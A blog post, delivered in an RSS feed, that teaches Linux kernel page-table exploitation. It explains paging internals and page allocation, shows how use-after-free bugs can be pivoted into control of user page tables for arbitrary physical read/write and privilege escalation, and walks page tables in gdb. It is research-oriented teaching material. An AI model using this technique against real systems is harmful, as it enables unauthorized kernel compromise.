<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[sam4k]]></title><description><![CDATA[blogging about pwning kernels and os internals]]></description><link>https://sam4k.com/</link><image><url>https://sam4k.com/favicon.png</url><title>sam4k</title><link>https://sam4k.com/</link></image><generator>Ghost 4.48</generator><lastBuildDate>Thu, 16 Apr 2026 12:50:59 GMT</lastBuildDate><atom:link href="https://sam4k.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Kernel Exploitation Techniques: Turning The (Page) Tables]]></title><description><![CDATA[This post explores attacking page tables as a Linux kernel exploitation technique for gaining powerful read/write primitives.]]></description><link>https://sam4k.com/page-table-kernel-exploitation/</link><guid isPermaLink="false">67fbb9eb752e23048bb85792</guid><category><![CDATA[VRED]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Wed, 07 May 2025 14:01:41 GMT</pubDate><media:content url="https://sam4k.com/content/images/2025/07/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2025/07/tired_computer.gif" alt="Kernel Exploitation Techniques: Turning The (Page) Tables"><p>Two posts in the space of two weeks?! What on earth has gotten into me. Well, I figured I ought to get into the OffensiveCon spirit and get another post on exploitation out there.</p><p>So today we&apos;ll be looking at (user) page table exploitation. 
If you&apos;ve been keeping up with some of the great kernel exploitation research put out there lately (of which I&apos;ll be sharing plenty in this article, don&apos;t worry!), you might have noticed a trend in techniques targeting page tables in order to gain powerful read/write primitives.</p><p>The goal for this post is to provide some insight into why targeting page tables can be such a powerful exploitation technique. We&apos;ll do a primer on how paging works in Linux, to give us some context, before looking at how we can gain control of page tables in the first place, how to exploit them for privilege escalation and which mitigations to be aware of.</p><p>As I mentioned, there&apos;s a plethora of great research out there, so where relevant I&apos;ll link to it so you can take a deeper dive into specific topics or approaches. At the end of the post I&apos;ll include a section grouping all the relevant public research together.</p><p>So without further ado, let&apos;s get stuck in!</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#paging-primer">Paging Primer</a></li>
<li><a href="#exploitation">Exploitation</a>
<ul>
<li><a href="#user-page-table-allocation">User Page Table Allocation</a></li>
<li><a href="#page-table-corruption">Page Table Corruption?</a>
<ul>
<li><a href="#page-level-primitives">Page-Level Primitives</a></li>
<li><a href="#what-about-other-primitives">What About Other Primitives?</a></li>
</ul>
</li>
<li><a href="#exploiting-a-page-uaf">Exploiting A Page UAF?</a>
<ul>
<li><a href="#pt-entries">PT Entries</a></li>
<li><a href="#huge-pages">Huge Pages</a></li>
<li><a href="#going-for-a-walk">Going For A Walk</a></li>
<li><a href="#approaches">Approaches</a></li>
<li><a href="#on-caching">On Caching</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#mitigations">Mitigations</a>
<ul>
<li><a href="#physical-kaslr">Physical KASLR</a></li>
<li><a href="#read-only-memory">Read-Only Memory</a></li>
</ul>
</li>
<li><a href="#resources">Resources</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="paging-primer">Paging Primer</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/05/what_am_i_looking_at.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="480" height="480"><figcaption>he&apos;s looking at pages, get it?</figcaption></figure><p>Before we get into the nitty gritty of page tables in kernel exploitation, we should probably quickly cover what page tables are so we understand why exploiting them is so powerful.</p><p>Let&apos;s pick up where we left off with my <a href="https://sam4k.com/linternals/#virtual-memory">three-part series on virtual memory</a>; if you&apos;re not familiar with concepts like physical vs virtual memory or the user virtual address space, feel free to check out those posts for a recap before heading into this section. </p><p>Okay, so, we have this general idea of the virtual memory model. Let&apos;s take the simple example of running a program, which we&apos;ve <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/#what-is-memory-management">touched on previously</a>:</p><ul><li>First, the program itself is stored on disk and must be read</li><li>It is loaded into RAM, where the physical address in memory is mapped into our process&apos; virtual address space</li><li>This &quot;mapping&quot; means that when our program accesses a mapped virtual address, it will be translated into the appropriate physical address so the memory can be accessed</li></ul><p>Page tables are what facilitate the translation of virtual to physical addresses. Why &quot;page&quot; tables? 
<a href="https://sam4k.com/linternals-memory-allocators-part-1/#page-primer">Recall</a> that virtual memory is divided into &quot;pages&quot; which are <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18"><code>PAGE_SIZE</code></a> (typically 4096) bytes of contiguous virtual memory; in this case it defines the granularity at which chunks of physical memory are mapped into the virtual address space.</p><p>Each process has its own page tables, as does the kernel, to track what parts of its virtual address space are mapped to what parts of physical memory. So how does this work?</p><p>Page tables are organised into a hierarchy, or levels, with each table containing pointers to the next level. At the lowest level, the table contains pointers to a page of physical memory. Linux currently supports up to 5 levels<sup><a href="https://docs.kernel.org/mm/page_tables.html">[1]</a></sup>: </p><ul><li>Page Global Directory (PGD): Each entry in this table points to a P4D</li><li>Page Level 4 Directory (P4D): Each entry in this table points to a PUD</li><li>Page Upper Directory (PUD): Each entry in this table points to a PMD</li><li>Page Middle Directory (PMD): Each entry in this table points to a PT</li><li>Page Table (PT): Each entry (PTE) points to a page of physical memory</li></ul><p>Note that a lot of systems may still use 4-level page tables. In the event a page table level isn&apos;t used (i.e. P4D is only used for 5-level page tables), it is &quot;folded&quot; AKA skipped.</p><p>Okay, that sounds fairly straightforward, right? And to add to the page-ception, each of these tables is <code>PAGE_SIZE</code> bytes. 
But how do these facilitate address translation?</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/05/image-1.png" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="850" height="346" srcset="https://sam4k.com/content/images/size/w600/2025/05/image-1.png 600w, https://sam4k.com/content/images/2025/05/image-1.png 850w" sizes="(min-width: 720px) 720px"><figcaption>Overview of page table structure (Linux x86_64) by <a href="https://www.researchgate.net/scientific-contributions/Hiroki-Kuzuno-2166786557">Hiroki Kuzuno</a>, <a href="https://www.researchgate.net/profile/Toshihiro-Yamauchi-2">Toshihiro Yamauchi</a> <sup><a href="https://www.researchgate.net/figure/Overview-of-page-table-structure-Linux-x86-64-architecture-in-22_fig1_353593783">[1]</a></sup></figcaption></figure><p>That&apos;s where this helpful diagram comes in! Let&apos;s unpack it. In the centre we can see a 4-level page table hierarchy, with the PGD on the left and the final page on the right.</p><p>Looking up, we can see the bits that make up a 64-bit x86_64 virtual address. We can see that the offsets into each table level, and the final page, are actually stored in the virtual address! Isn&apos;t that neat?! </p><p>There are a few extra details to note here. First, keen readers might notice that we&apos;re actually only using the lower 48 bits of the virtual address! What&apos;s that <code>Sign extended</code> portion? As addresses are canonically 64 bits (i.e. that&apos;s how they&apos;re treated and handled), the remaining bits 48-63 are sign extended from (i.e. copy) bit 47. </p><p>This bit is important, as it denotes if an address is a low address (for userspace) or a high address (for the kernel virtual address space). Don&apos;t believe me? 
Compare a kernel and userspace address on your x86_64 machine and you&apos;ll always see those bits set/unset.</p><p>Some more useful bits (figuratively speaking) worth mentioning are that:</p><ul><li>Page table entries aren&apos;t just pointers to the next level/memory, they can also contain important metadata like permissions (spoiler alert). </li><li>It&apos;s not just PTEs that can point to physical memory. There&apos;s a concept of huge pages, whereby a PMD points to a huge page of physical memory (a bit out of scope for this).</li><li>The kernel&apos;s page tables are set up at boot time. A process&apos; page tables are set up when it&apos;s created. It used to be the case that the kernel&apos;s page tables were copied into each process&apos; tables (remember, they span a mutually exclusive virtual address range).</li><li>However, since Meltdown (2018) and speculative execution side-channely shenanigans, Kernel Page Table Isolation (KPTI, <code><a href="https://cateee.net/lkddb/web-lkddb/PAGE_TABLE_ISOLATION.html">CONFIG_PAGE_TABLE_ISOLATION</a></code> / <code><a href="https://cateee.net/lkddb/web-lkddb/MITIGATION_PAGE_TABLE_ISOLATION.html">CONFIG_MITIGATION_PAGE_TABLE_ISOLATION</a></code>) was introduced. This removes the kernel mappings from userspace, switching to a separate page table with all the mappings when entering &quot;kernel mode&quot; (i.e. during a syscall, interrupt). 
</li></ul><p>I&apos;ll touch on all of this in much more detail in the next instalment of my memory <a href="https://sam4k.com/linternals/#memory-management">management linternals series</a>, but there&apos;s also plenty of great resources out there<sup><a href="https://docs.kernel.org/mm/page_tables.html">[1]</a><a href="https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md">[2]</a></sup>.</p><hr><ol><li><a href="https://docs.kernel.org/mm/page_tables.html">https://docs.kernel.org/mm/page_tables.html</a></li><li><a href="https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md">https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md</a></li></ol><h2 id="exploitation">Exploitation</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/the_good_part.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="480" height="270"></figure><p>Alright, now we&apos;re getting to the fun part! Given what we know about paging in the Linux kernel, we can start to understand why page tables present such a powerful exploitation target. </p><p>Gaining control over even a single PTE (or PMD entry, as this could be a huge page) means not just having control over the access permissions for that virtual memory mapping but also the physical address it maps to. </p><p>When we think of Kernel Address Space Layout Randomisation (KASLR), we&apos;re typically thinking about the virtual address of the kernel. 
Physical KASLR is slightly different and may not always be present (as is the case for upstream <code>aarch64</code>) or may be weaker.</p><p>Therefore, control over a PTE belonging to our process essentially grants us arbitrary physical address read and write primitives, giving control over the kernel while also bypassing mitigations that hinder other techniques.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/image-2.png" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="613" height="359" srcset="https://sam4k.com/content/images/size/w600/2025/05/image-2.png 600w, https://sam4k.com/content/images/2025/05/image-2.png 613w"></figure><p>But of course, this is all easier said than done! First we have to control a PTE...</p><p>So we have a target in mind for corruption: page tables. In order to realise that goal, we need to consider:</p><ul><li>How page tables are allocated by the kernel, so we know what kind of corruption primitive we need to corrupt them</li><li>Are there generic approaches to gain a page table corruption primitive?</li><li>How do we want to leverage our page table corruption for local privilege escalation?</li></ul><h3 id="user-page-table-allocation">User Page Table Allocation</h3><p>If we want to consider memory corruption, we need to understand how page tables are allocated. As the kernel&apos;s page tables are set up at boot time, this section will just focus on how user page tables (i.e. for a userspace process) are allocated.</p><p>I&apos;ll save the deep dive for linternals and cut to the chase. User page tables are by default allocated on demand: whenever a virtual address is accessed (read or written) and has a valid physical memory mapping, any missing page tables will be allocated and populated. </p><p>We can use some maths to reliably trigger this. Recall that each page table is <code>PAGE_SIZE</code> bytes. On a 64-bit system, entries are 64 bits (8 bytes). 
That means each page table has <code>4096 / 8 = 512</code> entries. We can then work out the virtual address range of each page table level:</p><ul><li>PTE-level table: Each of the 512 entries points to <code>PAGE_SIZE</code> bytes of physical memory. Therefore it spans <code>512 x 4096 = 2097152 = 0x200000 = 2MB</code>. </li><li>Page Middle Directory (PMD): Each entry spans 2MB. An entry may point to a PT or a 2MB block of memory (a huge page). The PMD itself spans <code>0x40000000 = 1GB</code></li><li>This continues with the PUD spanning 512GB and the PGD spanning 256TB. </li></ul><p>We can infer from this that the virtual address mapped by the first entry of a PTE-level table is aligned to <code>0x200000</code>. If we <code>mmap()</code> a page of anonymous memory to a fixed address, aligned to this value, we can determine a few things:</p><ul><li>This virtual address&apos; mapping will be the first entry in its PTE-level table</li><li>If there haven&apos;t been any other mappings in this page table (i.e. for the next <code>0x200000 - 0x1000</code> bytes), then this page table hasn&apos;t been allocated yet. Thus, accessing (read/writing) this mapping will cause it to be allocated.</li></ul><p>Another quirk to note is that <code>mmap()</code> can be passed the <code>MAP_POPULATE</code> flag to populate the necessary page tables at the time the mapping is created.</p><p>With that mildly relevant tangent out of the way, let&apos;s look at some code. Due to the tight integration with the hardware, some of the page table handling code is architecture specific. For <code>x86_64</code> our trail starts here:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">gfp_t __userpte_alloc_gfp = GFP_PGTABLE_USER | PGTABLE_HIGHMEM;

pgtable_t pte_alloc_one(struct mm_struct *mm)
{
	return __pte_alloc_one(mm, __userpte_alloc_gfp);
}
</code></pre><figcaption>arch/x86/mm/pgtable.c</figcaption></figure><p>Note the GFP flags used: <code>GFP_PGTABLE_USER | PGTABLE_HIGHMEM</code>. A few calls deeper we then get to the <code>asm-generic</code> implementation, <code>pagetable_alloc_noprof()</code>:</p><figure class="kg-card kg-code-card"><pre><code>/**
 * pagetable_alloc - Allocate pagetables
 * @gfp:    GFP flags
 * @order:  desired pagetable order
 *
 * pagetable_alloc allocates memory for page tables as well as a page table
 * descriptor to describe that memory.
 *
 * Return: The ptdesc describing the allocated page tables.
 */
static inline struct ptdesc *pagetable_alloc_noprof(gfp_t gfp, unsigned int order)
{
	struct page *page = alloc_pages_noprof(gfp | __GFP_COMP, order);

	return page_ptdesc(page);
}
</code></pre><figcaption>include/asm-generic/pgalloc.h (used for PTs, PMDs and PUDs)</figcaption></figure><p>As we can see, user page tables are allocated using the page allocator, with GFP flags <code>GFP_PGTABLE_USER | PGTABLE_HIGHMEM | __GFP_COMP</code>. Okay, one step closer!</p><p>Now we know we&apos;re dealing with the page allocator. This means that if we want to use a memory corruption primitive to control a page table, we need to have some control over a similarly allocated page from the same allocator. Let&apos;s explore this a bit:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/05/phys_mem_mgmt.png" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="959" height="544" srcset="https://sam4k.com/content/images/size/w600/2025/05/phys_mem_mgmt.png 600w, https://sam4k.com/content/images/2025/05/phys_mem_mgmt.png 959w" sizes="(min-width: 720px) 720px"><figcaption><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF slides</a> by PAN ZHENPENG &amp; JHENG BING JHONG</figcaption></figure><p>Above is a diagram showing some page allocator internals. <a href="https://sam4k.com/linternals-memory-allocators-part-1/#0x02-the-buddy-page-allocator">Recall</a> that the page allocator manages chunks of physically contiguous memory by <code>order</code>, where the size of the chunk is <code>2<sup>order</sup> * PAGE_SIZE</code>. </p><p>Free memory chunks are managed by the <code>free_area</code> list, whose index is the <code>order</code> of the free chunks of memory it manages. Each <code>order</code> then has a <code>free_list</code> for each of the <code>MIGRATE_TYPES</code>, which points to the actual memory chunks. Working our way back, you&apos;ll then notice each zone has its own <code>free_area</code> list... 
Not to mention each CPU maintains its own per-CPU page cache... So yeah, that&apos;s a lot.</p><p>This means when we&apos;re doing any kind of page allocator-level corruption, we need to be aware of all the variables: the CPU cache, zone, migrate type etc. </p><p>In our situation: Our page table is <code>PAGE_SIZE</code> bytes, so a single order-0 page. The GFP flags determine the zone and migrate type. Let&apos;s quickly walk through those:</p><ul><li><code>GFP_PGTABLE_USER</code> after peeling back the macros is <code>__GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_ZERO | __GFP_ACCOUNT</code>. No <code>__GFP_RECLAIMABLE|__GFP_MOVABLE</code> means no <code>MIGRATE_MOVABLE</code><sup><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16">[3]</a></sup>.</li><li><code>PGTABLE_HIGHMEM</code> is effectively 0 unless <code>CONFIG_HIGHMEM</code> is set.</li><li><code>__GFP_COMP</code> is for compound pages<sup><a href="https://lwn.net/Articles/619514/">[4]</a></sup>, but doesn&apos;t affect our zone/migrate type.</li></ul><p>So to sum it all up: page tables are order-0 pages allocated by the page allocator, from <code>ZONE_NORMAL</code>, <code>MIGRATE_UNMOVABLE</code>. </p><h3 id="page-table-corruption">Page Table Corruption?</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/tell_me_more.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="635" height="340"></figure><p>Okay, we know what page tables are, why they&apos;re powerful targets for exploitation and now we also know how user page tables are allocated - so how do we get control of one?!</p><p>The vulnerability research gods are fickle ones and we&apos;re often at the whims of the primitives we&apos;re given. 
So let&apos;s explore a few cases and how we might leverage them to get control of a page table.</p><h4 id="page-level-primitives">Page-Level Primitives</h4><p>By far the &quot;easiest&quot; way would be if we had a nice <strong>order-0 page use-after-free (UAF)</strong>, with suitable zone and migrate types. In this scenario, we could do some classic memory feng shui to have our page reallocated as a page table. </p><p>Even if it wasn&apos;t an order-0 page, due to the <a href="https://sam4k.com/linternals-memory-allocators-part-1/#buddy-system-algorithm">buddy algorithm</a>, if we exhaust the order-0 pages the allocator will split order-1 pages; if they&apos;re exhausted, then order-2 and so on. A similar technique could be used to exploit a page allocator-level out-of-bounds write (OOBW), by having our OOBW source page allocated adjacent to our page table. </p><p>I thought I&apos;d share some cool public research demonstrating this; funnily enough, page-level UAFs aren&apos;t too common, so both examples are from GPU bugs:</p><ul><li><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF - Two ways of Rooting All Qualcomm based Android phones</a> (aarch64)</li><li><a href="https://i.blackhat.com/BH-US-24/Presentations/REVISED02-US24-Gong-The-Way-to-Android-Root-Wednesday.pdf">The Way to Android Root: Exploiting Your GPU On Smartphone</a> (aarch64)</li></ul><h4 id="what-about-other-primitives">What About Other Primitives?</h4><p>But what if we don&apos;t have a nice page-level UAF? What if we&apos;ve got a run-of-the-mill SLAB allocator-level UAF? Is there any hope for us?! Yes!</p><p>As an avid reader of my linternals series, I&apos;m sure you&apos;ll remember that the slabs used by the SLAB allocator are in fact themselves allocated by the page allocator! 
</p><p>Therefore, if our UAF object is within a slab, perhaps we can cause this slab to get freed, returned to the page allocator and reallocated as a user page table?! We&apos;d need to be mindful of the slab&apos;s <code>order</code> (aka size) and what write primitives we can get with our UAF in order to corrupt the page table&apos;s contents, but it&apos;s certainly doable.</p><p>How do I know? Because this is the crux of the <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable technique</a> published by <a href="https://x.com/NVamous">@NVamous</a> back in 2023. This writeup details pivoting several vulnerabilities into page UAFs in order to gain control over user page tables, so check it out for more details!</p><p>In a similar vein, PageJack was published in 2024 (<a href="https://phrack.org/issues/71/13#article">Phrack article</a>, <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">BlackHat slides</a>) by Jinmeng Zhou, Jiayi Hu, Wenbo Shen &amp; Zhiyun Qian. 
This technique also aims to provide a generic approach to gain a page UAF, by pivoting our initial primitive to induce the free of specific &quot;bridge objects&quot;, which in turn causes a page UAF.</p><p>Below are some more writeups demonstrating these techniques:</p><ul><li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606">&quot;Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup&quot;</a> by <a href="https://x.com/ptryudai">@ptrYudai</a> (x86_64) (2023)</li><li><a href="https://pwning.tech/nftables/">&quot;Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques&quot;</a> by <a href="https://x.com/notselwyn/">@notselwyn</a> expands on the Dirty Pagetable technique (x86_64) (2024)</li></ul><h3 id="exploiting-a-page-uaf">Exploiting A Page UAF?</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/hacking.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="480" height="270"></figure><p>The pieces are finally aligned: we know what page tables are, why they&apos;re a big deal and now we even know how to get control of them ... but what do we do with all this power?!</p><p>As I mentioned earlier, we&apos;re often at the whims of whatever bug the VR gods have tossed our way, so each bug is going to have its own quirks. Maybe you have an 8 byte arbitrary write or maybe you only have control over a single bit. While I can&apos;t cover all eventualities, hopefully this section provides enough information to figure it out.</p><p>So we have, either directly or through some technique, gained a page UAF, had that page reallocated as a user page table (for our process) and as a result have the means to corrupt all or some portion of the page table - what&apos;s next? 
</p><h4 id="pt-entries">PT Entries</h4><p>First things first, we want to understand what we&apos;re corrupting - what does our page table <em>actually</em> contain? Sure, it maps a specific page of virtual memory to a physical address, but what does this involve? </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/05/x86_64_pte-1.png" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="430" height="288"><figcaption>x86_64 PT Entry from <a href="https://wiki.osdev.org/Paging">OSDev.wiki</a></figcaption></figure><p>Above is a diagram of what an 8-byte PT entry looks like on x86_64. Here <code>M</code> is the maximum physical address bit, i.e. how many bits are used for addressing. As we touched on earlier, this isn&apos;t actually 64, but a small value such as 47.</p><p>So this is a pretty smart use of space. As we know, these entries map pages in memory (i.e. <code>PAGE_SIZE</code> bytes of memory), so all addresses are page aligned. With a page size of <code>0x1000</code>, this means the lower bits 0-11 are always going to be zero, so they can be used for metadata! Similarly, anything above the maximum address bit can be used for metadata.</p><p>Remember, this user page table corresponds to a portion (a 2MB portion specifically) of our process&apos;s virtual address space. So we&apos;re interested in: </p><ul><li>The address bits, which control the physical page in memory that the virtual address corresponding to this entry will map to when accessed by our process.</li><li>The permission bits, particularly if we map a read-only file (such as an SUID binary or system library) into the virtual address range covered by this page table. </li></ul><h4 id="huge-pages">Huge Pages</h4><p>As we&apos;ve touched on, PMDs and PUDs are allocated the same way as PTs - via the page allocator. So it is also feasible we could target one of these for our page-UAF. 
</p><p>Albeit, in their default use case, this would be less practical than corrupting a PT. A PT would let us direct a virtual address to an arbitrary physical address, but PMD and PUD entries point to other tables ... Apart from huge pages! </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/05/x86_64_pmd_pud.png" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="430" height="626"><figcaption>x86_64 PUD, PMD and PT Entry from <a href="https://wiki.osdev.org/Paging">OSDev.wiki</a></figcaption></figure><p>The above diagram shows the formatting for x86_64 PUD, PMD and PT entries. Both the PUD and PMD entries include a Page Size (<code>PS</code>) attribute. If this bit is set, it is treated as mapping to a huge page of physical memory, whose size is appropriate for the page level.</p><p>As we covered earlier, for a PMD this is 2MB and for a PUD it&apos;s 1GB. As the physical addresses are aligned to the size of the mapping, we can see the PMD entry has even fewer address bits than the PT entry and the PUD even fewer than the PMD. </p><h4 id="going-for-a-walk">Going For A Walk</h4><p>So far this has been all quite abstract, so, if you&apos;ll indulge me, let&apos;s go for a quick (page table) walk. We&apos;ll take all the paging internals we&apos;ve picked up so far to do some debugging in order to get some hands-on experience and confirm what we&apos;ve learned.</p><p>For our little walk, I&apos;m going to use the following program to set up an interesting virtual address space to explore via kernel debugging:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;unistd.h&gt;

#define PAGE_SIZE (0x1000UL)
#define PT_SIZE (512 * PAGE_SIZE) // 0x200000
#define PMD_SIZE (512 * PT_SIZE)  // 0x40000000
#define PUD_SIZE (512 * PMD_SIZE) // 0x8000000000
#define PGD_SIZE (512 * PUD_SIZE) // 0x1000000000000

int main()
{
    int fd = open(&quot;test.txt&quot;, O_RDONLY);

    mmap((void*)(PUD_SIZE + PMD_SIZE + PT_SIZE), 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)(PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE), 0x1000, PROT_READ, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)(PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE + PAGE_SIZE), 0x1000, PROT_READ, MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, fd, 0);

    getchar(); // pause program so I can set a bp to trigger on the next mmap()
    mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    return 0;
}</code></pre><figcaption>Note: MAP_POPULATE is used to make sure the tables are populated on mmap()ing them</figcaption></figure><p>The aim of this little program is to create three mappings, with slightly different permissions and attributes, at a fixed location. Why a fixed location?</p><p>Because as we&apos;ve learned, the virtual address space is directly reflected by its page tables. So by using a fixed address we can calculate exactly which PT our page entries will be in.</p><p>To make this a little easier, I created some macros to define the size each page table level spans. So, as the virtual address space is reflected directly by the page tables, we know that virtual address <code>0x0</code> is going to be mapped by <code>PGD[0][0][0][0]</code> - where the first index is the PGD entry, then that PUD entry, that PMD entry and finally that PT entry.</p><p>So if we map at fixed address <code>PUD_SIZE + PMD_SIZE + PT_SIZE</code> we&apos;re offsetting it by exactly one PUD, one PMD and one PT. So we should find it at <code>PGD[1][1][1][0]</code>.</p><p>We can also do it the technical way and explore the bits of the address. <code>PUD_SIZE + PMD_SIZE + PT_SIZE == 0x8040200000</code>. Let&apos;s check out the bits:</p><pre><code>Bit:  63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32
Val:   0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0

Bit:  31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10  9  8  7  6  5  4  3  2  1  0
Val:   0  1  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0</code></pre><p>In the paging primer earlier we showed that the entry offsets for the PGD, PUD, PMD, PT were stored in bits <code>39-47</code>, <code>30-38</code>, <code>21-29</code> and <code>12-20</code> respectively. Here we can see those values correspond to <code>1</code>, <code>1</code>, <code>1</code> and <code>0</code>. The same as our previous guess! </p><p>Note that the next two mappings are each offset by <code>PAGE_SIZE</code>, i.e. one PT entry, so they should form 3 contiguous PT entries.</p><p>This is all still theoretical though so let&apos;s put our money where our mouth is. I set up a kernel debugging environment <a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging">using gdb and x86_64 QEMU</a>. The plan is to:</p><ul><li>Run this program on the guest</li><li>When it pauses at <code>getchar()</code>, set a breakpoint in gdb at <code>vm_area_alloc(mm)</code></li><li>Continue the program, hit the breakpoint. We now, lazily, have a reference to our process&apos;s <code>mm_struct</code> which contains a pointer to its PGD. We can now walk our PGD and find our entries!</li></ul><p>And, just like that we can dump our process&apos;s PGD:</p><pre><code>(gdb) x/10gx mm-&gt;pgd
0xffff888106b50000:     0x8000000100172067      0x8000000102c9b067
0xffff888106b50010:     0x0000000000000000      0x0000000000000000
0xffff888106b50020:     0x0000000000000000      0x0000000000000000
</code></pre><p>Great, so far so good. We can see <code>PGD[1]</code> is populated with <code>0x8000000102c9b067</code>. To find the address of the PUD this entry points to, we need to clear the metadata. This, for us, is bits 0:11 and 48:63. We can remove this with a simple mask: <code>0x8000000102c9b067 &amp; 0x0000FFFFFFFFF000 = 0x102C9B000</code>.</p><p>Awesome, so now we can move on to our PUD...</p><pre><code>(gdb) x/10gx 0x102C9B000
0x102c9b000:    Cannot access memory at address 0x102c9b000
</code></pre><p>Ah wait, that&apos;s a physical address, right, and gdb is dealing with virtual addresses. Not to worry! Fortunately, the <a href="https://sam4k.com/linternals-virtual-memory-part-3/">kernel virtual address space</a> includes a direct mapping of all physical memory (physmap). For x86_64 this is at <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/page_64_types.h#L45">__PAGE_OFFSET</a>, <code>0xffff888000000000</code>. </p><p>Sooo if that&apos;s the kernel virtual address mapped to the start of physical memory, we just need to offset that by our physical address and we should see our PUD...</p><pre><code>(gdb) x/2gx (0xffff888000000000 + 0x102c9b000)
0xffff888102c9b000:     0x0000000000000000      0x000000010436d067</code></pre><p>Voila! And again, as expected, we have our entry at <code>PGD[1][1]</code>. Let&apos;s keep going:</p><pre><code>(gdb) x/2gx (0xffff888000000000 + (0x000000010436d067 &amp; 0x0000FFFFFFFFF000))
0xffff88810436d000:     0x0000000000000000      0x0000000101346067
</code></pre><p>Now we&apos;re into the PMD and as expected, we see <code>PGD[1][1][1]</code> populated. The next step is the PT, where we should see three entries with slightly different permissions:</p><pre><code>(gdb) x/4gx (0xffff888000000000 + (0x0000000101346067 &amp; 0x0000FFFFFFFFF000))
0xffff888101346000:     0x8000000107422067      0x80000000034ff225
